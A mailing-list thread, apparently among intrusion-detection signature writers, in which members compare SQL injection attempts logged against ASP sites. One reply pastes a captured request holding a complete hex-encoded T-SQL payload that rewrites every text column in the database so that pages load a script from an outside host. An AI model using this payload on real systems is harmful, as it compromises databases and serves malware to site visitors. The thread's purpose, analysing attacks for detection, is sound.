[Emerging-Sigs] Interesting SQL Injection attempts

[RPG]

Yes, I've been seeing a lot of this as well.   User agent is "Indy 
Library".   Here's a partial transcript with minor details changed to 
protect the innocent.

SRC: POST 
/product_xyzxyz.asp?sid=61497&sbid=61515&strSection=blablablabla&strSubSection=sometext;DECLARE%20 at S%20NVARCHAR(4000);SET%20 at S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D003100360
03700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D002000730065007400
SRC: 
20005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- 
HTTP/1.0
SRC: Connection: keep-alive
SRC: Content-Type: text/html
SRC: Content-Length: 0
SRC: Host: www.XYZXYZXYX.com
SRC: Accept: text/html, */*
SRC: User-Agent: Mozilla/3.0 (compatible; Indy Library)
SRC:
SRC:

Matt Jonkman wrote:
> This sent in from someone that's got to remain anonymous. Anyone have 
> more info or theories?
> 
> ----------
> 
>   A week or so ago I started seeing a lot of hits on sid 2008175 WEB
> Possible SQL Injection (varchar) from APNIC.  Today, I'm seeing lots of
> a broken variant (?) from more than one geo NIC with the first seen from
> RIPE.  It starts off the same as the 2008175 hits I've been monitoring
> but is somehow truncated.  It makes it as far as declaring the '@C
> varchar(25' then has another (hex) 3 I assume should lead into a x35
> (char 5) but is overlaid with http header..  Different user-agent info
> also.    Odd!!!    xxx's denote sanitizing.  Any ideas what is going on?
> 
> 
> 
> GET /xxxxx/apps/contact/xxx
> xxx.asp?id=86&subcatid=62
> ;DECLARE%20 at S%20
> NVARCHAR(4000);S
> ET%20 at S=CAST(0x4
> 400450043004C004
> 1005200450020004
> 0005400200076006
> 1007200630068006
> 1007200280032003
> 500350029002C004
> 0004300200076006
> 1007200630068006
> 1007200280032003
> 5003www.xxxx.u
> s HTTP/1.1..Acce
> pt: text/html, a
> pplication/xml;q
> =0.9, applicatio
> n/xhtml+xml, */*
> ;q=0.1..Accept-L
> anguage: en-gb..
> Accept-Encoding:
>   deflate..User-A
> gent: Mozilla/5.
> 0 (Windows NT 5.
> 1; U; en; rv:1.8
> .0) Gecko/200607
> 28 Firefox/1.5.0
>   Opera 9.25..Hos
> t: www.xxxxx.us
> ..Connection: Cl
> ose....
> 
> 
>